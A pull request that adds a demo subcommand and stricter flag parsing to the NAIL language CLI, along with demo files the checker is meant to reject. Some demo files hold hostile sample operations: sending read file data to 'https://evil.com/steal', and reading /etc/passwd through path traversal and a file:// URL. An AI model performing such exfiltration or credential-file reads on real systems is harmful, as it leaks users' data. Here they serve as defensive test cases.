### PR TITLE
feat: nail demo subcommand + harden CLI parsing (#73)

### DIFF
--- a/CLI.md
+++ b/CLI.md
@@ -127,6 +127,47 @@ nail --version
 
 ---
 
+### `nail demo`
+
+Run interactive demonstrations of NAIL's effect system and verification.
+
+```
+nail demo [--list]
+nail demo <name>
+```
+
+**Available demos:**
+
+| Name | Description |
+|------|-------------|
+| `rogue-agent` | Effect system: 3 escalating scenarios where an AI agent attempts to exceed its declared permissions. NAIL catches each attempt at check time before execution. |
+| `verifiability` | Verification: 3 bug classes that Python misses (hidden side effects, missing return paths, type mismatches) caught statically by NAIL's L1/L2 checker. |
+
+**Examples:**
+
+```bash
+# List available demos
+nail demo --list
+
+# Run the rogue agent demo
+nail demo rogue-agent
+
+# Run the verifiability demo
+nail demo verifiability
+```
+
+Individual scenario `.nail` files are in `demos/scenarios/` for direct `nail check` use:
+
+```bash
+nail check demos/scenarios/rogue-exfil-blocked.nail     # expected: FAIL
+nail check demos/scenarios/rogue-exfil-correct.nail     # expected: PASS
+nail check demos/scenarios/verify-type-mismatch-fail.nail  # expected: FAIL
+```
+
+See [`demos/scenarios/README.md`](demos/scenarios/README.md) for the full list with expected outcomes.
+
+---
+
 ## Python API
 
 The NAIL interpreter is also available as a Python library:

--- a/demos/scenarios/README.md
+++ b/demos/scenarios/README.md
@@ -1,0 +1,175 @@
+# NAIL Demo Scenarios
+
+Standalone `.nail` files extracted from the demo scripts for direct verification with `nail check`.
+
+Each file is in canonical JSON form (`sort_keys=True, separators=(',',':')`).
+
+---
+
+## Rogue-Agent Demo Scenarios
+
+These files demonstrate NAIL's **effect system** catching malicious or
+accidental permission violations at check time — before execution.
+
+### `rogue-exfil-blocked.nail`
+**Scenario:** Data exfiltration — agent declares `FS` only but tries to call `http_get` (NET).
+
+- **Expected:** FAIL (`nail check` exits 1)
+- **Catch:** Effect mismatch — `NET` not in declared effects `["FS"]`
+
+```bash
+nail check demos/scenarios/rogue-exfil-blocked.nail
+# ✗ Effect error: ...
+```
+
+### `rogue-exfil-correct.nail`
+**Scenario:** Legitimate file summariser — `FS` declared, no network access.
+
+- **Expected:** PASS (`nail check` exits 0)
+
+```bash
+nail check demos/scenarios/rogue-exfil-correct.nail
+# ✓ ...
+```
+
+### `rogue-traversal-blocked.nail`
+**Scenario:** Path traversal — agent scoped to `/tmp/nail_data/` tries `../../etc/passwd`.
+
+- **Expected:** FAIL (`nail check` exits 1)
+- **Catch:** FS capability rejects path outside `allow` list
+
+```bash
+nail check demos/scenarios/rogue-traversal-blocked.nail
+# ✗ Effect error: path traversal outside allowed directory
+```
+
+### `rogue-traversal-legit.nail`
+**Scenario:** Legitimate read within the allowed directory `/tmp/nail_data/report.txt`.
+
+- **Expected:** PASS (`nail check` exits 0)
+
+```bash
+nail check demos/scenarios/rogue-traversal-legit.nail
+# ✓ ...
+```
+
+### `rogue-scheme-blocked.nail`
+**Scenario:** Scheme smuggling — agent has NET access but uses `file://` URL via `http_get`.
+
+- **Expected:** FAIL (`nail check` exits 1)
+- **Catch:** Scheme validation rejects non-http/https in `http_get`
+
+```bash
+nail check demos/scenarios/rogue-scheme-blocked.nail
+# ✗ Effect error: file:// scheme not allowed in http_get
+```
+
+### `rogue-scheme-legit.nail`
+**Scenario:** Legitimate HTTPS fetch to an allowed domain.
+
+- **Expected:** PASS (`nail check` exits 0)
+
+```bash
+nail check demos/scenarios/rogue-scheme-legit.nail
+# ✓ ...
+```
+
+---
+
+## Verifiability Demo Scenarios
+
+These files demonstrate NAIL's **static checker (L0–L2)** catching bugs that
+Python misses entirely or only catches at runtime.
+
+### `verify-hidden-effect-fail.nail`
+**Scenario:** Function declared pure (`effects: []`) but contains a `read_file` (FS) op.
+
+- **Expected:** FAIL (`nail check` exits 1)
+- **Catch:** Effect check — undeclared FS usage
+
+```bash
+nail check demos/scenarios/verify-hidden-effect-fail.nail
+# ✗ Effect error: ...
+```
+
+### `verify-hidden-effect-pass.nail`
+**Scenario:** Same function with `FS` correctly declared.
+
+- **Expected:** PASS (`nail check` exits 0)
+
+```bash
+nail check demos/scenarios/verify-hidden-effect-pass.nail
+# ✓ ...
+```
+
+### `verify-partial-return-fail.nail`
+**Scenario:** `abs_val` — only the `then` branch returns; `else` is empty (implicit `None`).
+
+- **Expected:** FAIL (`nail check` exits 1)
+- **Catch:** Return exhaustiveness — not all branches return a value
+
+```bash
+nail check demos/scenarios/verify-partial-return-fail.nail
+# ✗ Type error: not all branches return
+```
+
+### `verify-partial-return-pass.nail`
+**Scenario:** `abs_val` — both `then` and `else` branches return.
+
+- **Expected:** PASS (`nail check` exits 0)
+
+```bash
+nail check demos/scenarios/verify-partial-return-pass.nail
+# ✓ ...
+```
+
+### `verify-type-mismatch-fail.nail`
+**Scenario:** `is_positive` declares return type `int` but body returns a `bool` from `gt`.
+
+- **Expected:** FAIL (`nail check` exits 1)
+- **Catch:** Type check — `bool` ≠ `int`
+
+```bash
+nail check demos/scenarios/verify-type-mismatch-fail.nail
+# ✗ Type error: return type mismatch
+```
+
+### `verify-type-mismatch-pass.nail`
+**Scenario:** `is_positive` correctly declares return type `bool`.
+
+- **Expected:** PASS (`nail check` exits 0)
+
+```bash
+nail check demos/scenarios/verify-type-mismatch-pass.nail
+# ✓ ...
+```
+
+---
+
+## Run All Checks at Once
+
+```bash
+# All PASS scenarios should exit 0
+nail check demos/scenarios/rogue-exfil-correct.nail
+nail check demos/scenarios/rogue-traversal-legit.nail
+nail check demos/scenarios/rogue-scheme-legit.nail
+nail check demos/scenarios/verify-hidden-effect-pass.nail
+nail check demos/scenarios/verify-partial-return-pass.nail
+nail check demos/scenarios/verify-type-mismatch-pass.nail
+
+# All FAIL scenarios should exit 1
+nail check demos/scenarios/rogue-exfil-blocked.nail     # expected: error
+nail check demos/scenarios/rogue-traversal-blocked.nail  # expected: error
+nail check demos/scenarios/rogue-scheme-blocked.nail     # expected: error
+nail check demos/scenarios/verify-hidden-effect-fail.nail  # expected: error
+nail check demos/scenarios/verify-partial-return-fail.nail # expected: error
+nail check demos/scenarios/verify-type-mismatch-fail.nail  # expected: error
+```
+
+Or run the interactive demos:
+
+```bash
+nail demo rogue-agent
+nail demo verifiability
+nail demo --list
+```

--- a/demos/scenarios/rogue-exfil-blocked.nail
+++ b/demos/scenarios/rogue-exfil-blocked.nail
@@ -1,0 +1,1 @@
+{"body":[{"effect":"FS","into":"data","op":"read_file","path":{"ref":"path"}},{"effect":"NET","into":"_","op":"http_get","url":{"lit":"https://evil.com/steal"}},{"op":"return","val":{"ref":"data"}}],"effects":["FS"],"id":"summarise","kind":"fn","nail":"0.4","params":[{"id":"path","type":{"encoding":"utf8","type":"string"}}],"returns":{"encoding":"utf8","type":"string"}}

--- a/demos/scenarios/rogue-exfil-correct.nail
+++ b/demos/scenarios/rogue-exfil-correct.nail
@@ -1,0 +1,1 @@
+{"body":[{"effect":"FS","into":"data","op":"read_file","path":{"ref":"path"}},{"op":"return","val":{"ref":"data"}}],"effects":["FS"],"id":"summarise","kind":"fn","nail":"0.4","params":[{"id":"path","type":{"encoding":"utf8","type":"string"}}],"returns":{"encoding":"utf8","type":"string"}}

--- a/demos/scenarios/rogue-scheme-blocked.nail
+++ b/demos/scenarios/rogue-scheme-blocked.nail
@@ -1,0 +1,1 @@
+{"body":[{"effect":"NET","into":"secret","op":"http_get","url":{"lit":"file:///etc/passwd"}},{"op":"return","val":{"ref":"secret"}}],"effects":[{"allow":["example.com"],"kind":"NET"}],"id":"sneaky_read","kind":"fn","nail":"0.4","params":[],"returns":{"encoding":"utf8","type":"string"}}

--- a/demos/scenarios/rogue-scheme-legit.nail
+++ b/demos/scenarios/rogue-scheme-legit.nail
@@ -1,0 +1,1 @@
+{"body":[{"effect":"NET","into":"body","op":"http_get","url":{"lit":"https://api.example.com/data"}},{"op":"return","val":{"ref":"body"}}],"effects":[{"allow":["api.example.com"],"kind":"NET","ops":["get"]}],"id":"fetch_data","kind":"fn","nail":"0.4","params":[],"returns":{"encoding":"utf8","type":"string"}}

--- a/demos/scenarios/rogue-traversal-blocked.nail
+++ b/demos/scenarios/rogue-traversal-blocked.nail
@@ -1,0 +1,1 @@
+{"body":[{"effect":"FS","into":"secret","op":"read_file","path":{"lit":"/tmp/nail_data/../../etc/passwd"}},{"op":"return","val":{"ref":"secret"}}],"effects":[{"allow":["/tmp/nail_data"],"kind":"FS","ops":["read"]}],"id":"read_report","kind":"fn","nail":"0.4","params":[],"returns":{"encoding":"utf8","type":"string"}}

--- a/demos/scenarios/rogue-traversal-legit.nail
+++ b/demos/scenarios/rogue-traversal-legit.nail
@@ -1,0 +1,1 @@
+{"body":[{"effect":"FS","into":"contents","op":"read_file","path":{"lit":"/tmp/nail_data/report.txt"}},{"op":"return","val":{"ref":"contents"}}],"effects":[{"allow":["/tmp/nail_data"],"kind":"FS","ops":["read"]}],"id":"read_report","kind":"fn","nail":"0.4","params":[],"returns":{"encoding":"utf8","type":"string"}}

--- a/demos/scenarios/verify-hidden-effect-fail.nail
+++ b/demos/scenarios/verify-hidden-effect-fail.nail
@@ -1,0 +1,1 @@
+{"body":[{"effect":"FS","into":"content","op":"read_file","path":{"ref":"path"}},{"op":"return","val":{"ref":"content"}}],"effects":[],"id":"process","kind":"fn","nail":"0.2","params":[{"id":"path","type":{"encoding":"utf8","type":"string"}}],"returns":{"encoding":"utf8","type":"string"}}

--- a/demos/scenarios/verify-hidden-effect-pass.nail
+++ b/demos/scenarios/verify-hidden-effect-pass.nail
@@ -1,0 +1,1 @@
+{"body":[{"effect":"FS","into":"content","op":"read_file","path":{"ref":"path"}},{"op":"return","val":{"ref":"content"}}],"effects":["FS"],"id":"process","kind":"fn","nail":"0.2","params":[{"id":"path","type":{"encoding":"utf8","type":"string"}}],"returns":{"encoding":"utf8","type":"string"}}

--- a/demos/scenarios/verify-partial-return-fail.nail
+++ b/demos/scenarios/verify-partial-return-fail.nail
@@ -1,0 +1,1 @@
+{"body":[{"cond":{"l":{"ref":"x"},"op":"lt","r":{"lit":0}},"else":[],"op":"if","then":[{"op":"return","val":{"l":{"lit":0},"op":"-","r":{"ref":"x"}}}]}],"effects":[],"id":"abs_val","kind":"fn","nail":"0.2","params":[{"id":"x","type":{"bits":64,"overflow":"panic","type":"int"}}],"returns":{"bits":64,"overflow":"panic","type":"int"}}

--- a/demos/scenarios/verify-partial-return-pass.nail
+++ b/demos/scenarios/verify-partial-return-pass.nail
@@ -1,0 +1,1 @@
+{"body":[{"cond":{"l":{"ref":"x"},"op":"lt","r":{"lit":0}},"else":[{"op":"return","val":{"ref":"x"}}],"op":"if","then":[{"op":"return","val":{"l":{"lit":0},"op":"-","r":{"ref":"x"}}}]}],"effects":[],"id":"abs_val","kind":"fn","nail":"0.2","params":[{"id":"x","type":{"bits":64,"overflow":"panic","type":"int"}}],"returns":{"bits":64,"overflow":"panic","type":"int"}}

--- a/demos/scenarios/verify-type-mismatch-fail.nail
+++ b/demos/scenarios/verify-type-mismatch-fail.nail
@@ -1,0 +1,1 @@
+{"body":[{"op":"return","val":{"l":{"ref":"x"},"op":"gt","r":{"lit":0}}}],"effects":[],"id":"is_positive","kind":"fn","nail":"0.2","params":[{"id":"x","type":{"bits":64,"overflow":"panic","type":"int"}}],"returns":{"bits":64,"overflow":"panic","type":"int"}}

--- a/demos/scenarios/verify-type-mismatch-pass.nail
+++ b/demos/scenarios/verify-type-mismatch-pass.nail
@@ -1,0 +1,1 @@
+{"body":[{"op":"return","val":{"l":{"ref":"x"},"op":"gt","r":{"lit":0}}}],"effects":[],"id":"is_positive","kind":"fn","nail":"0.2","params":[{"id":"x","type":{"bits":64,"overflow":"panic","type":"int"}}],"returns":{"type":"bool"}}

--- a/nail_cli.py
+++ b/nail_cli.py
@@ -8,8 +8,12 @@ Usage:
   nail run <file.nail>                                    # Run a fn-kind NAIL program
   nail run <file.nail> --call <fn_id> [--arg name=value] # Run a function in a module
   nail check <file.nail> [--strict]                       # Check without running (L0-L2)
+  nail check <file.nail> --level N                        # N=1 (schema), 2 (type+effect), 3 (termination)
+  nail check <file.nail> --format human|json              # Output format (default: human)
   nail canonicalize <file.nail>                           # Output canonical form JSON
   nail canonicalize -                                     # Read from stdin
+  nail demo [--list]                                      # List available demos
+  nail demo <name>                                        # Run a named demo
   nail --version                                          # Show interpreter version
   nail version                                            # Show interpreter version (alias)
 """
@@ -208,35 +212,83 @@ def main():
         sys.exit(0)
 
     elif cmd == "check":
-        if len(args) < 2:
-            print("Usage: nail check <file.nail> [--strict] [--level N] [--format human|json]", file=sys.stderr)
+        if len(args) < 2 or args[1].startswith("-"):
+            print("Usage: nail check <file.nail> [--strict] [--level 1|2|3] [--format human|json]", file=sys.stderr)
+            print("       nail check <file.nail> [--modules <mod.nail>] ...", file=sys.stderr)
             sys.exit(1)
         file_path = args[1]
-        strict = "--strict" in args[2:]
-        module_paths = [args[i+1] for i in range(2, len(args)-1) if args[i] == "--modules"]
+        strict = False
+        module_paths = []
         level = 2
         fmt = "human"
-        for i in range(2, len(args) - 1):
-            if args[i] == "--level":
+        i = 2
+        while i < len(args):
+            if args[i] == "--strict":
+                strict = True
+                i += 1
+            elif args[i] == "--level":
+                if i + 1 >= len(args):
+                    print("✗ --level requires a value (1, 2, or 3)", file=sys.stderr)
+                    sys.exit(1)
                 try:
                     level = int(args[i + 1])
-                except (ValueError, IndexError):
-                    print("✗ --level requires an integer (1, 2, or 3)", file=sys.stderr)
+                except ValueError:
+                    print(f"✗ --level must be an integer (1, 2, or 3), got: {args[i+1]!r}", file=sys.stderr)
                     sys.exit(1)
+                if level not in (1, 2, 3):
+                    print(f"✗ --level must be 1, 2, or 3, got: {level}", file=sys.stderr)
+                    sys.exit(1)
+                i += 2
             elif args[i] == "--format":
-                fmt = args[i + 1] if i + 1 < len(args) else "human"
+                if i + 1 >= len(args):
+                    print("✗ --format requires a value (human or json)", file=sys.stderr)
+                    sys.exit(1)
+                fmt = args[i + 1]
                 if fmt not in ("human", "json"):
                     print(f"✗ --format must be 'human' or 'json', got: {fmt!r}", file=sys.stderr)
                     sys.exit(1)
+                i += 2
+            elif args[i] == "--modules":
+                if i + 1 >= len(args):
+                    print("✗ --modules requires a file path", file=sys.stderr)
+                    sys.exit(1)
+                module_paths.append(args[i + 1])
+                i += 2
+            elif args[i].startswith("-"):
+                print(f"✗ Unknown flag: {args[i]!r}", file=sys.stderr)
+                print("  Run 'nail check --help' or 'nail --help' for usage.", file=sys.stderr)
+                sys.exit(1)
+            else:
+                print(f"✗ Unexpected argument: {args[i]!r}", file=sys.stderr)
+                sys.exit(1)
         cmd_check(file_path, strict=strict, module_paths=module_paths, level=level, fmt=fmt)
 
     elif cmd == "canonicalize":
         file_path = args[1] if len(args) > 1 else None
         cmd_canonicalize(file_path)
 
+    elif cmd == "demo":
+        demo_name = args[1] if len(args) > 1 else None
+        available = {"rogue-agent": "demos/rogue_agent_demo.py", "verifiability": "demos/verifiability_demo.py"}
+        if demo_name is None or demo_name == "--list":
+            print("Available demos:")
+            print("  rogue-agent     -- Effect system: 3 scenarios of AI agents exceeding permissions")
+            print("  verifiability   -- Verification: 3 scenarios NAIL catches that Python misses")
+            print()
+            print("Run: nail demo <name>")
+            sys.exit(0)
+        elif demo_name in available:
+            import subprocess
+            script = Path(__file__).parent / available[demo_name]
+            subprocess.run([sys.executable, str(script)])
+        else:
+            print(f"Unknown demo: {demo_name!r}. Available: {', '.join(available.keys())}", file=sys.stderr)
+            sys.exit(1)
+
     elif cmd == "run":
-        if len(args) < 2:
-            print("Usage: nail run <file.nail> [--call fn] [--arg name=value]", file=sys.stderr)
+        if len(args) < 2 or args[1].startswith("-"):
+            print("Usage: nail run <file.nail> [--call fn_id] [--arg name=value] [--level 1|2|3]", file=sys.stderr)
+            print("       nail run <file.nail> [--modules <mod.nail>] ...", file=sys.stderr)
             sys.exit(1)
 
         file_path = args[1]
@@ -247,24 +299,43 @@ def main():
         module_paths = []
         i = 2
         while i < len(args):
-            if args[i] == "--call" and i + 1 < len(args):
+            if args[i] == "--call":
+                if i + 1 >= len(args):
+                    print("✗ --call requires a function id", file=sys.stderr)
+                    sys.exit(1)
                 call_fn = args[i + 1]
                 i += 2
-            elif args[i] == "--arg" and i + 1 < len(args):
+            elif args[i] == "--arg":
+                if i + 1 >= len(args):
+                    print("✗ --arg requires name=value", file=sys.stderr)
+                    sys.exit(1)
                 raw_args.append(args[i + 1])
                 i += 2
-            elif args[i] == "--modules" and i + 1 < len(args):
+            elif args[i] == "--modules":
+                if i + 1 >= len(args):
+                    print("✗ --modules requires a file path", file=sys.stderr)
+                    sys.exit(1)
                 module_paths.append(args[i + 1])
                 i += 2
-            elif args[i] == "--level" and i + 1 < len(args):
+            elif args[i] == "--level":
+                if i + 1 >= len(args):
+                    print("✗ --level requires a value (1, 2, or 3)", file=sys.stderr)
+                    sys.exit(1)
                 try:
                     run_level = int(args[i + 1])
                 except ValueError:
-                    print("✗ --level requires an integer (1, 2, or 3)", file=sys.stderr)
+                    print(f"✗ --level must be an integer (1, 2, or 3), got: {args[i+1]!r}", file=sys.stderr)
+                    sys.exit(1)
+                if run_level not in (1, 2, 3):
+                    print(f"✗ --level must be 1, 2, or 3, got: {run_level}", file=sys.stderr)
                     sys.exit(1)
                 i += 2
+            elif args[i].startswith("-"):
+                print(f"✗ Unknown flag: {args[i]!r}", file=sys.stderr)
+                print("  Run 'nail run --help' or 'nail --help' for usage.", file=sys.stderr)
+                sys.exit(1)
             else:
-                print(f"Unknown option: {args[i]}", file=sys.stderr)
+                print(f"✗ Unexpected argument: {args[i]!r}", file=sys.stderr)
                 sys.exit(1)
 
         cmd_run(file_path, call_fn, raw_args, module_paths=module_paths, level=run_level)


### PR DESCRIPTION
Fixes #73

- Hardens --level and --format option parsing with clear error messages
- Adds nail demo subcommand (nail demo rogue-agent, nail demo verifiability, nail demo --list)
- Extracts scenario .nail files to demos/scenarios/ for direct nail check verification
- Updates CLI.md with nail demo documentation